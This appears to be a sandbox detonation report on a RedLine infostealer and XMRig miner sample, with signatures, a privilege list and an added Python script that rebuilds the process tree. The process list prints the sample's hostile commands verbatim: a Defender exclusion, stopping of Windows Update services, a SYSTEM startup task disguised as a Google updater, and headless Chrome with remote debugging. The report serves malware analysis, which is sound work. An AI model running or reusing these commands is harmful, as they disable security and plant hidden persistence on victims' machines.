SHA512 242a425ded0fe6f2a2b3da1172e885bee9f898a62cda6c21e2189655fdb488bd15c21fa0bebd56d8fbedcf7fff86fee2fdbb0c00ed5c3ad8434e9f5ddcbc067c

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\f_000003

MD5 21808cd0724524589cd4ec1ce26f6d58
SHA1 fc5cc4cb347ed20389626c58a6de396ef1ac5ada
SHA256 1a7608a326717e18f424991b924d9c7319eb273cc3af432585d95ce8b068ca8d
SHA512 36902ff35a1ed469aa9cab3856b1b0057ca7db8ea4d92ca1d129e68f02eebd5322a4e81aec29a2b1c0c289e2f82df13684ccf0305378878494260c4d4e6caf0d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\f_000002

MD5 1004b3178d9754cf8d8fc84e84af3fca
SHA1 b3433dbc533ca7e9e0ec51f65b6b0959c9972466
SHA256 97694c8fd1b6b9b06e6ad8707d8ed88fb77868487b48815cf8ada3c767365536
SHA512 e49a691d54e22204e67c99ec223dc65577466031c202090b3a662d7dee12a5ea2c7183563e5db911c705b5048124a64c6a300d017fb54074ee1c5f8523a23fec

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\data_3

MD5 4efd52a3659408e2992597f4cff0e9b0
SHA1 594e641de628a8ce18e313151cd93faeab03cb09
SHA256 4a4ad3d1322185c1811656ade6c355d02c07856668af98a4bf731968b6868492
SHA512 b866a9636baa230b07201d136ee4da14b2e855e9deefb7f3789c6359ba8f2afa8e1e1337e953ff8401b532f16a2de59286ea98dc261ef9d53bbd201bb7c623c3

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\data_2

MD5 f1b04c9be144fa0c39ba1fbc54c387fd
SHA1 f7deb2858033f1dd9abdcc7b01ad1d54d1b921da
SHA256 3c4e084c63b162ce9d44f40f0daee7a8648bfab2d153b03739f4442af84b62ad
SHA512 e026932dcdaf6b1c632e3c4988eb7f1df1aa70345b305b6347ecc078af477338e6d4d6afadaeb1f480ef26831c354f4bb5f868cae96058a0385ccabe77ba9e71

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\data_1

MD5 883689b4df1ab4088733834a74f7abc8
SHA1 a6baab15b60d6b37d1c76ce00a89f09e4588ad27
SHA256 08fd23d3060540426c9be17d24c88af9361d469d687375a931e89e7f7a9cd80d
SHA512 bbc2825acd88c4a36a67ad07d091380f190aaa0c2fcfd1fc4e97f89b10349a3281855610ea53b7597b1749e37e45e86193b9499c667f2ecd3494c4a852713e55

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\data_0

MD5 27d036d1ac77db850f874c36352c781e
SHA1 a54b28dd81395d1ea59540a8ab32676225b045f6
SHA256 a8d4fa5b5535bf104c9c278df697153be2229e3bb6806f9e1f7f6ff442093f8f
SHA512 c1401c828750f9876d589f7b12a112600c9684d04ea0c5561dcbc8a221edd40b270f8c08ac87e79ef8e6e22a9061add3b5432ba2f496b2699eacf9729e2bb289

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Crashpad\settings.dat

MD5 e2ed554bc8ed84124d8cbc60811992c3
SHA1 3e2c9ce94ce60cea2b1867dfbb4e7d915e53cbea
SHA256 0fcd36faed007c2e1584a80aa4f7e29ece7371256be0489b8c96ef59c0345a80
SHA512 71aafd1cf7266345e7b9ff05dae9e8bae76629da062d81d091fd873bdb7afc23cd2c51ee1381a8d5c2c7b6a55c259c78f701abae6a12ad2e8fa16045a914a6eb

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\DevToolsActivePort

MD5 6daa5a71c3c5d9c99689c8fb469a29ca
SHA1 b1e1ad7cbf7092ba607f926a857639060558f913
SHA256 87fa8ed60cd5a50e665e1f53b8ceeb1de635ede95281051c8462329a09d15436
SHA512 85942de33330989391f666890a2084774bc3025314ec2281ab7e404992a0b3cb6b2a7313ac978aca36dc4b3d1655fdd8dab6b9da2ca167d7e33c3d8c11d2553d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Code Cache\js\343f6993e27f1d39_0

MD5 174c33a70785eebba3db88aebf9c36fb
SHA1 acaab9f213e6a5919b53dc0acfb924788dcb5332
SHA256 1cf0017fd76a2c9a249f9870f4707e9b69714915c661b8cac5bb10d37cd7866c
SHA512 d8896b595028bf46e6f511fe5417e422f50a66cbe852bc4c4a66a0c4420e08f0bf6eeb82633e1625a98055a1d742ceb792487ddee3794dc97741550a004d2644

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Code Cache\js\06db5837b6c74111_0

MD5 cc66747df689407fb50a279920cef74d
SHA1 db5875af6460551bc00c703914a0f2523813cd76
SHA256 bf86c9aa91c57124caaf7a5bdec0c7fd0e9dae659335bb7e6b7fa86fd527dab4
SHA512 b549a2583f13ffaa5455f28aeb0e7fdaee74b3249d630b34a77c7576893765631c1a35c5e4fc2f772cd11d1189917617d113ab78f3baccf059c0473f450404ec

memory/380-663-0x000000013F380000-0x00000001405A6000-memory.dmp

memory/2516-664-0x00000000775A0000-0x0000000077749000-memory.dmp

memory/2516-665-0x000000013F380000-0x00000001405A6000-memory.dmp

memory/1612-666-0x0000000019B70000-0x0000000019E52000-memory.dmp

memory/1612-668-0x0000000000240000-0x0000000000248000-memory.dmp

memory/1612-667-0x000007FEF5180000-0x000007FEF5B1D000-memory.dmp

memory/1612-670-0x00000000011C0000-0x0000000001240000-memory.dmp

memory/1612-669-0x000007FEF5180000-0x000007FEF5B1D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-11 00:10

Reported

2023-08-11 00:13

Platform

win10v2004-20230703-en

Max time kernel

80s

Max time network

129s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4516 created 3212 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 4516 created 3212 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 4516 created 3212 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 4516 created 3212 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 (SeTimeZonePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 (SeDelegateSessionUserImpersonatePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 (SeTimeZonePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 (SeDelegateSessionUserImpersonatePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Note: Token values shown as bare numbers are privilege LUIDs the sandbox did not resolve to a name (33 = SeIncreaseWorkingSetPrivilege, 34 = SeTimeZonePrivilege, 35 = SeCreateSymbolicLinkPrivilege, 36 = SeDelegateSessionUserImpersonatePrivilege). Each powershell.exe block enables SeIncreaseQuota through SeDelegateSessionUserImpersonate in LUID order, which is the complete privilege set of an elevated administrator token being enabled in one pass rather than a single targeted privilege. The chrome.exe and powercfg.exe entries (SeShutdown, SeCreatePagefile) are routine for those programs; SeDebugPrivilege on the sample itself is the entry that matters for injection into other processes.

Suspicious use of WriteProcessMemory

Description Indicator Process Target Count
PID 2856 wrote to memory of 4868 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe 2
PID 2856 wrote to memory of 4868 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Program Files\Google\Chrome\Application\chrome.exe 1
PID 4868 wrote to memory of 4516 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Windows\Temp\setup.exe 2
PID 2856 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe 3
PID 2856 wrote to memory of 64 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe 3
PID 756 wrote to memory of 3704 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe 2
PID 756 wrote to memory of 4132 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe 2
PID 756 wrote to memory of 3780 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe 2
PID 756 wrote to memory of 4284 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe 2
PID 64 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe 2
PID 3784 wrote to memory of 1116 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe 2
PID 756 wrote to memory of 2988 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe 2
PID 3484 wrote to memory of 692 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe 2
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe 37

Note: identical rows are collapsed; Count is the number of times the sandbox recorded the same parent-to-child write (64 rows in total). The sample (PID 2856) writes into each executable it drops (mi.exe, cli.exe, cc.exe) before they run. PID 4868 is reported under two image names, mi.exe and chrome.exe, so the chrome.exe -> setup.exe row is PID 4868 (started as mi.exe) writing into setup.exe rather than the browser; treat the image name of that PID as unreliable until confirmed from the process tree. PID 3784 is the headless chrome.exe launched by cc.exe (PID 64); its writes into its own children (1116, 1496), like the cmd.exe -> sc.exe/powercfg.exe rows, are parent-to-child writes of the kind this sandbox also records for ordinary process creation.
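The table above is flat, but the "PID X wrote to memory of Y" rows encode the sample's process tree. The following script is an added example for this report, not sandbox output: it parses rows in the report's own notation, counts repeated writes per parent/child pair, renders the tree, and flags any PID that the sandbox reported under more than one image name (the PID 4868 case). The rows embedded below are a constructed subset of the table, transcribed with duplicates kept so the counting has something to collapse.

```python
"""Rebuild a parent/child process tree from sandbox "PID X wrote to memory of Y" rows."""
import re
from collections import Counter, defaultdict
from typing import Dict, List, Set, Tuple

TEMP = r"C:\Users\Admin\AppData\Local\Temp"
SAMPLE = TEMP + r"\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
SYS32 = r"C:\Windows\System32"

# Constructed input: a subset of the report's rows, duplicates kept on purpose.
SAMPLE_ROWS = "\n".join([
    f"PID 2856 wrote to memory of 4868 N/A {SAMPLE} {TEMP}\\mi.exe",
    f"PID 2856 wrote to memory of 4868 N/A {SAMPLE} {TEMP}\\mi.exe",
    f"PID 2856 wrote to memory of 4868 N/A {SAMPLE} {CHROME}",
    f"PID 4868 wrote to memory of 4516 N/A {CHROME} C:\\Windows\\Temp\\setup.exe",
    f"PID 2856 wrote to memory of 844 N/A {SAMPLE} {TEMP}\\cli.exe",
    f"PID 2856 wrote to memory of 64 N/A {SAMPLE} {TEMP}\\cc.exe",
    f"PID 756 wrote to memory of 3704 N/A {SYS32}\\cmd.exe {SYS32}\\sc.exe",
    f"PID 756 wrote to memory of 3780 N/A {SYS32}\\cmd.exe {SYS32}\\powercfg.exe",
    f"PID 64 wrote to memory of 3784 N/A {TEMP}\\cc.exe {CHROME}",
    f"PID 3784 wrote to memory of 1116 N/A {CHROME} {CHROME}",
    f"PID 3784 wrote to memory of 1496 N/A {CHROME} {CHROME}",
    f"PID 3784 wrote to memory of 1496 N/A {CHROME} {CHROME}",
    f"PID 3784 wrote to memory of 1496 N/A {CHROME} {CHROME}",
])

# Paths contain spaces ("Program Files"), so split on the ".exe " boundary, not on whitespace.
ROW = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (.+?\.exe) (.+\.exe)$", re.I)

Edge = Tuple[int, int, str, str]  # parent pid, child pid, parent image, child image


def parse_rows(text: str) -> List[Edge]:
    edges: List[Edge] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = ROW.match(line.strip())
        if not m:
            raise ValueError(f"unrecognised row: {line!r}")
        edges.append((int(m[1]), int(m[2]), m[3], m[4]))
    return edges


def build_tree(edges: List[Edge]):
    """children[parent][child] = number of recorded writes; images[pid] = image names seen for pid."""
    children: Dict[int, Counter] = defaultdict(Counter)
    images: Dict[int, Set[str]] = defaultdict(set)
    for parent, child, parent_image, child_image in edges:
        children[parent][child] += 1
        images[parent].add(parent_image)
        images[child].add(child_image)
    return children, images


def image_conflicts(images: Dict[int, Set[str]]) -> Dict[int, Set[str]]:
    """PIDs reported under more than one image: PID reuse or image replacement, verify by hand."""
    return {pid: names for pid, names in images.items() if len(names) > 1}


def roots(children: Dict[int, Counter]) -> List[int]:
    """Parents that never appear as a child; each one starts a separate tree."""
    all_children = {c for kids in children.values() for c in kids}
    return sorted(p for p in children if p not in all_children)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def render(children, images, pid: int, depth: int = 0, writes: int = 0) -> List[str]:
    label = " | ".join(sorted(basename(i) for i in images.get(pid, set())))
    suffix = f"  [{writes} writes]" if writes else ""
    lines = [f"{'  ' * depth}{pid} {label}{suffix}"]
    for child, n in sorted(children.get(pid, {}).items()):
        lines.extend(render(children, images, child, depth + 1, n))
    return lines


if __name__ == "__main__":
    edges = parse_rows(SAMPLE_ROWS)
    children, images = build_tree(edges)
    for root in roots(children):
        print("\n".join(render(children, images, root)))
    for pid, names in image_conflicts(images).items():
        print(f"PID {pid} reported as: {', '.join(sorted(basename(n) for n in names))}")
```

Run against the full table the same way; the cmd.exe trees (PIDs 756 and 3484) come out as separate roots because the table never records who wrote into cmd.exe, which is itself a reminder that "wrote to memory of" rows are a partial view of process creation, not a full tree.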

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe

"C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=19990 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1" --profile-directory="Default"

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffe06359758,0x7ffe06359768,0x7ffe06359778

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1676 --field-trial-handle=1456,i,3240205178489115400,914140057255821042,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1340 --field-trial-handle=1456,i,3240205178489115400,914140057255821042,131072 --disable-features=PaintHolding /prefetch:2

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=19990 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1984 --field-trial-handle=1456,i,3240205178489115400,914140057255821042,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=19990 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2264 --field-trial-handle=1456,i,3240205178489115400,914140057255821042,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=19990 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2500 --field-trial-handle=1456,i,3240205178489115400,914140057255821042,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=19990 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3128 --field-trial-handle=1456,i,3240205178489115400,914140057255821042,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=19990 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3172 --field-trial-handle=1456,i,3240205178489115400,914140057255821042,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=19990 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3432 --field-trial-handle=1456,i,3240205178489115400,914140057255821042,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataG71ZT" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataG71ZT\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataG71ZT" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffdf7bb46f8,0x7ffdf7bb4708,0x7ffdf7bb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

